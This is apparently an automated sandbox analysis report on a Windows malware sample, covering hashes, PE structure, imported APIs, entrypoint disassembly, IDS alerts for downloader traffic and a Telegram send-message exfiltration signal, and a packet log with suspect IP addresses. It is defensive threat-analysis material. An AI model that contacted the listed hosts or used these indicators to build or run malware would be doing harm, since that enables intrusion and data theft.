Preview:	}o.OSHLWTGML.V4.57OPHLW.GML6IV4057OPHLWPGML6IV4057OPHLWPGML.IV4>.AP.E.q.L..h.\YF.?"'+%1m/W'8[D.Up:99p.#lr...]ZS~EA]tGML6IV4X%.b\|9.)\|6.2.8.J..H1o9.)[..2.8.J.D.1.9.)bd#28.J..^1.9.)bd62.8.Jb\T'\|9.)PGML6IV4057OPHLW...6IV4`p7O.IHW$.M.6IV4057O.HoV[FDL6.W40.5OPHLW..ML6YV40.6OPH.WPWML6KV4557OPHLWUGML6IV40%3OPLLW.\|OL4IV.05'OPXLWPG]L6YV4057O@HLWPGML6IV4. 5O.HLWP'OL..W4057OPHLWPGML6IV4057OPHLW..LLIV4057OPHLWPGML6IV4057OPHLW.JOLvIV4057OPHLWP.LL.HV4057OPHLWPGML6IV4057OPHLW~3(4BIV4(.6OPXLWP.LL6MV4057OPHLWPGML.IVT.GS.$)LW.ML6.W40[7OP.MWPGML6IV4057O.HL.~#,8WIV4..7OPhNWPQML6CT4057OPHLWPGMLvIV..GD=3HLW..LL6)T40.6OPhNWPGML6IV4057O.HL.PGML6IV4057OPHLWPGML6IV4057OPHLWPGML6IV4057OPHLWPGML6IV4057OPHLWPGML6IV4057OPHLWPGML6IV4057OPHLWPGML6IV4057OPHLWPGML6IV4057OPHLWPGML6IV4057OPHLWPGML6IV4057OPHLWPGML6IV4057OPHLWPGML6IV4057OPHLWPGML6IV4057OPHLWPGML6IV4057OPHLWPGML6IV4057OPHLWPGML6IV4057OPHLWPGML6IV4057OPHLWPGML6IV4057OPHLWPGML6IV4057OPHLWPGML6IV4057OPHLWPGML6IV4057OPHLWPGML6IV4057OPHLWPGML6IV4057OPHLW

C:\Users\user\AppData\Local\Temp\autD95C.tmp

Download File

Process:	C:\Users\user\Desktop\n0nsAzvYNd.exe
File Type:	data
Category:	dropped
Size (bytes):	240128
Entropy (8bit):	7.973610579122965
Encrypted:	false
SSDEEP:	6144:8isXsDgRt61eaNfC+bDJLkB2AJpDyJ8/foJmLW9kA:pAsDAjaNfCoD6BbZyJ8HRS
MD5:	C5813A8F24D5EB6712959F1914CC1FB1
SHA1:	D638C410BB9A81CEDE68D6BA2502C3759852204A
SHA-256:	751E39FEBED5ADEACE1F9D1887BA22416AA29FA77C28EC0A223AB8609CC6D570
SHA-512:	EE0E21B117C8EDB8031BCEB9888AC36DF74F196F06CD04F754E9E34940998D69E22065F0ABF89E2D00FB8D5D4BFBA7ED8396A9204A5A2C279FDD26AB5B7FE93F
Malicious:	false
Reputation:	low
Preview:	EA06..........".W.Q..N.4.Mf........&...`.!........'.m.....?.d..h.W+4h..E'..f2.l..'.V.Z...:..n........+.....E..n....Ivv+..M).M..(..yJ.E...x..[.w&Q...9D.La.....#.J......!M.Q....\.I..............oO.Ri.y'.... ..o.V..Jd.W.L#sP.....@+ ...l. C.....K.M&.....0jK3..)....O.M)5m..k'..+.".t........I.....d..g[.W.P.2.je2T...\|)T.e....ze3eH.0.o.9D.. J4S`..w..4...Rj.H.....Ji..$.....P.....M.P."..d^.#.N......@Z).z.D......>.......'.0..a..p% ..~l.a.............;..N.}.S...VM6.e....^.U..H..ds.\.a.3_..9..f......~9....#H.....F.I.Nf.Y.>...j5....n.1:]..........?4........T.X.T.&_3.N&..~..X.]._..+!...f..M>.Z.n6[;...E..8..:..Q..Y...4......{U..q....S4.mi......Cy.zoW.1.j.9e0..{>..,.W..]..9.e.<.$j.....Tz}2..........{....:.j.@b%@"..i(..?s.......t.".W..s..E+...r........i.>N.)\|...Y8.'WH..1W+m.kI.^9..D/.....S..3s.....,.6.Ug3..j!(...t:E&.R..y..D........+S...t.^.J!$..?:)w....Si.jO_.0.M...e.._.....M..n.b.E\......=......J....bu..'^.aO.].....D.1.......5I.....E.x...M.m..;.....P9.....5.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.141399547219736
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	n0nsAzvYNd.exe
File size:	1'163'264 bytes
MD5:	3599e1d5d724fbb382a29f1cad0aeda4
SHA1:	3e1b82de92038cdb85749473ddaef0d680765d23
SHA256:	d4e2fbfc32056e62acf75175d7612639a9987bea0b543c1805235c9582d4991a
SHA512:	4d977f01f4c90b55489e9ae40e61ef545dcc74da26a29f66b3fecb19610ba4903df82127a5ed8e50c2120e9be3a88eafb04ce94f70107e55e5980e2869915ee9
SSDEEP:	24576:3u6J33O0c+JY5UZ+XC0kGso6FakmIjQd2gvMSgt6EWY:Ru0c++OCvkGs9Fakqd22v7Y
TLSH:	6835BE22B3DDC360CB669173BF6AB7016EBF3C610630B95B1F980D7DA960162162D763
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x674FD085 [Wed Dec 4 03:46:13 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007FC168D3BACAh
jmp 00007FC168D2E894h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FC168D2EA1Ah
cmp edi, eax
jc 00007FC168D2ED7Eh
bt dword ptr [004C31FCh], 01h
jnc 00007FC168D2EA19h
rep movsb
jmp 00007FC168D2ED2Ch
cmp ecx, 00000080h
jc 00007FC168D2EBE4h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007FC168D2EA20h
bt dword ptr [004BE324h], 01h
jc 00007FC168D2EEF0h
bt dword ptr [004C31FCh], 00000000h
jnc 00007FC168D2EBBDh
test edi, 00000003h
jne 00007FC168D2EBCEh
test esi, 00000003h
jne 00007FC168D2EBADh
bt edi, 02h
jnc 00007FC168D2EA1Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007FC168D2EA23h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007FC168D2EA75h
bt esi, 03h
jnc 00007FC168D2EAC8h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x53798	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x11b000	0x711c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	d28a820a1d9ff26cda02d12b888ba4b4	False	0.5728679102422908	data	6.676118058520316	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x53798	0x53800	3029bf88c66223d9ae56a625a0e21aa3	False	0.9211908214820359	data	7.880698302645589	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x11b000	0x711c	0x7200	6fcae3cbbf6bfbabf5ec5bbe7cf612c3	False	0.7650767543859649	data	6.779031650454199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc75a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc76d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc77f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc7920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc7c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc7d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc8bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc9480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc99e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xcbf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xcd038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xcd4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xcd4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcda84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xce110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xce5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xceb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcf1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcf660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcf7b8	0x4aa5d	data			1.000330327678516
RT_GROUP_ICON	0x11a218	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x11a290	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x11a2a4	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x11a2b8	0x14	data	English	Great Britain	1.25
RT_VERSION	0x11a2cc	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x11a3a8	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T02:59:57.729619+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49704	193.122.130.0	80	TCP
2025-01-11T02:59:58.870174+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49704	193.122.130.0	80	TCP
2025-01-11T02:59:59.456700+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49706	104.21.80.1	443	TCP
2025-01-11T02:59:59.995156+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49707	193.122.130.0	80	TCP
2025-01-11T03:00:00.579448+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49708	104.21.80.1	443	TCP
2025-01-11T03:00:10.532782+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49712	104.21.80.1	443	TCP
2025-01-11T03:00:19.715554+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49755	104.21.80.1	443	TCP
2025-01-11T03:00:26.630399+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49791	104.21.80.1	443	TCP
2025-01-11T03:00:27.702501+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49799	104.21.80.1	443	TCP
2025-01-11T03:00:29.940565+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.5	49812	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 02:59:57.007349014 CET	49704	80	192.168.2.5	193.122.130.0
Jan 11, 2025 02:59:57.012399912 CET	80	49704	193.122.130.0	192.168.2.5
Jan 11, 2025 02:59:57.012515068 CET	49704	80	192.168.2.5	193.122.130.0
Jan 11, 2025 02:59:57.014692068 CET	49704	80	192.168.2.5	193.122.130.0
Jan 11, 2025 02:59:57.019551992 CET	80	49704	193.122.130.0	192.168.2.5
Jan 11, 2025 02:59:57.492989063 CET	80	49704	193.122.130.0	192.168.2.5
Jan 11, 2025 02:59:57.542177916 CET	49704	80	192.168.2.5	193.122.130.0
Jan 11, 2025 02:59:57.562222004 CET	49704	80	192.168.2.5	193.122.130.0
Jan 11, 2025 02:59:57.567058086 CET	80	49704	193.122.130.0	192.168.2.5
Jan 11, 2025 02:59:57.682564974 CET	80	49704	193.122.130.0	192.168.2.5
Jan 11, 2025 02:59:57.729619026 CET	49704	80	192.168.2.5	193.122.130.0
Jan 11, 2025 02:59:57.954375982 CET	49705	443	192.168.2.5	104.21.80.1
Jan 11, 2025 02:59:57.954410076 CET	443	49705	104.21.80.1	192.168.2.5
Jan 11, 2025 02:59:57.954484940 CET	49705	443	192.168.2.5	104.21.80.1
Jan 11, 2025 02:59:57.963999033 CET	49705	443	192.168.2.5	104.21.80.1
Jan 11, 2025 02:59:57.964020967 CET	443	49705	104.21.80.1	192.168.2.5
Jan 11, 2025 02:59:58.442464113 CET	443	49705	104.21.80.1	192.168.2.5
Jan 11, 2025 02:59:58.442558050 CET	49705	443	192.168.2.5	104.21.80.1
Jan 11, 2025 02:59:58.449592113 CET	49705	443	192.168.2.5	104.21.80.1
Jan 11, 2025 02:59:58.449614048 CET	443	49705	104.21.80.1	192.168.2.5
Jan 11, 2025 02:59:58.450035095 CET	443	49705	104.21.80.1	192.168.2.5
Jan 11, 2025 02:59:58.495086908 CET	49705	443	192.168.2.5	104.21.80.1
Jan 11, 2025 02:59:58.529678106 CET	49705	443	192.168.2.5	104.21.80.1
Jan 11, 2025 02:59:58.571336031 CET	443	49705	104.21.80.1	192.168.2.5
Jan 11, 2025 02:59:58.671134949 CET	443	49705	104.21.80.1	192.168.2.5
Jan 11, 2025 02:59:58.671288013 CET	443	49705	104.21.80.1	192.168.2.5
Jan 11, 2025 02:59:58.671366930 CET	49705	443	192.168.2.5	104.21.80.1
Jan 11, 2025 02:59:58.679637909 CET	49705	443	192.168.2.5	104.21.80.1
Jan 11, 2025 02:59:58.685292006 CET	49704	80	192.168.2.5	193.122.130.0
Jan 11, 2025 02:59:58.691054106 CET	80	49704	193.122.130.0	192.168.2.5
Jan 11, 2025 02:59:58.818803072 CET	80	49704	193.122.130.0	192.168.2.5
Jan 11, 2025 02:59:58.823559999 CET	49706	443	192.168.2.5	104.21.80.1
Jan 11, 2025 02:59:58.823595047 CET	443	49706	104.21.80.1	192.168.2.5
Jan 11, 2025 02:59:58.823667049 CET	49706	443	192.168.2.5	104.21.80.1
Jan 11, 2025 02:59:58.824099064 CET	49706	443	192.168.2.5	104.21.80.1
Jan 11, 2025 02:59:58.824115038 CET	443	49706	104.21.80.1	192.168.2.5
Jan 11, 2025 02:59:58.870173931 CET	49704	80	192.168.2.5	193.122.130.0
Jan 11, 2025 02:59:59.304466009 CET	443	49706	104.21.80.1	192.168.2.5
Jan 11, 2025 02:59:59.308859110 CET	49706	443	192.168.2.5	104.21.80.1
Jan 11, 2025 02:59:59.308876038 CET	443	49706	104.21.80.1	192.168.2.5
Jan 11, 2025 02:59:59.456798077 CET	443	49706	104.21.80.1	192.168.2.5
Jan 11, 2025 02:59:59.456964970 CET	443	49706	104.21.80.1	192.168.2.5
Jan 11, 2025 02:59:59.457187891 CET	49706	443	192.168.2.5	104.21.80.1
Jan 11, 2025 02:59:59.457842112 CET	49706	443	192.168.2.5	104.21.80.1
Jan 11, 2025 02:59:59.461555004 CET	49704	80	192.168.2.5	193.122.130.0
Jan 11, 2025 02:59:59.462836027 CET	49707	80	192.168.2.5	193.122.130.0
Jan 11, 2025 02:59:59.466573954 CET	80	49704	193.122.130.0	192.168.2.5
Jan 11, 2025 02:59:59.467657089 CET	80	49707	193.122.130.0	192.168.2.5
Jan 11, 2025 02:59:59.467766047 CET	49704	80	192.168.2.5	193.122.130.0
Jan 11, 2025 02:59:59.467828035 CET	49707	80	192.168.2.5	193.122.130.0
Jan 11, 2025 02:59:59.468077898 CET	49707	80	192.168.2.5	193.122.130.0
Jan 11, 2025 02:59:59.472834110 CET	80	49707	193.122.130.0	192.168.2.5
Jan 11, 2025 02:59:59.952271938 CET	80	49707	193.122.130.0	192.168.2.5
Jan 11, 2025 02:59:59.953749895 CET	49708	443	192.168.2.5	104.21.80.1
Jan 11, 2025 02:59:59.953845978 CET	443	49708	104.21.80.1	192.168.2.5
Jan 11, 2025 02:59:59.953955889 CET	49708	443	192.168.2.5	104.21.80.1
Jan 11, 2025 02:59:59.954232931 CET	49708	443	192.168.2.5	104.21.80.1
Jan 11, 2025 02:59:59.954274893 CET	443	49708	104.21.80.1	192.168.2.5
Jan 11, 2025 02:59:59.995156050 CET	49707	80	192.168.2.5	193.122.130.0
Jan 11, 2025 03:00:00.424993038 CET	443	49708	104.21.80.1	192.168.2.5
